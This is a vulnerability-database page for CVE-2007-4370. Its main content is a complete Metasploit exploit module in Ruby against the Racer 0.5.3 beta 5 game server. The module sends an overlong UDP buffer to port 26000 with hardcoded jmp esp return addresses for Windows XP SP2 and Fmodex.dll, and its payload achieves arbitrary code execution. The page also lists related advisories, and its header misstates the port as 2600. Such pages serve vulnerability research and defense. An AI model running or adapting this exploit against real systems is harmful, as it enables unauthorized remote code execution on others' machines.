Lucene search
K

Racer v0.5.3 Beta 5 Buffer Overflow

🗓️ 03 May 2009 11:10:37Reported by Trancek <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 35 Views

Racer v0.5.3 Beta 5 Buffer Overflow in UDP port 2600

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-4370
20 Mar 200900:00
circl
CVE
CVE-2007-4370
15 Aug 200723:00
cve
Cvelist
CVE-2007-4370
15 Aug 200723:00
cvelist
Exploit DB
Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)
20 Sep 201000:00
exploitdb
Tenable Nessus
GLSA-201412-09 : Multiple packages, Multiple vulnerabilities fixed in 2011
15 Dec 201400:00
nessus
Gentoo Linux
Multiple packages, Multiple vulnerabilities fixed in 2011
11 Dec 201400:00
gentoo
NVD
CVE-2007-4370
15 Aug 200723:17
nvd
OpenVAS
Gentoo Security Advisory GLSA 201412-09
29 Sep 201500:00
openvas
Packet Storm
Racer v0.5.3 beta 5 Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Buffer overflow
15 Aug 200723:17
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Racer v0.5.3 Beta 5 Buffer Overflow',
      'Description'    => %q{
          This module exploits the Racer Car and Racing Simulator game
        versions v0.5.3 beta 5 and earlier. Both the client and server listen
        on UDP port 26000. By sending an overly long buffer we are able to
        execute arbitrary code remotely.
      },
      'Author'         => [ 'Trancek <trancek[at]yashira.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4370' ],
          [ 'OSVDB', '39601' ],
          [ 'EDB', '4283' ],
          [ 'BID', '25297' ],
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x5c\x00",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
        },
      'DefaultOptions' =>
        {
          'AllowWin32SEH' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested ok aushack 20090503
          [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
          [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
          [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
        ],
      'DisclosureDate' => '2008-08-10',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(26000)
      ])
  end

  def exploit
    connect_udp

    buf = Rex::Text.rand_text_alphanumeric(1001)
    buf << [target.ret].pack('V')
    buf << payload.encoded
    buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)

    udp_sock.put(buf)

    handler
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation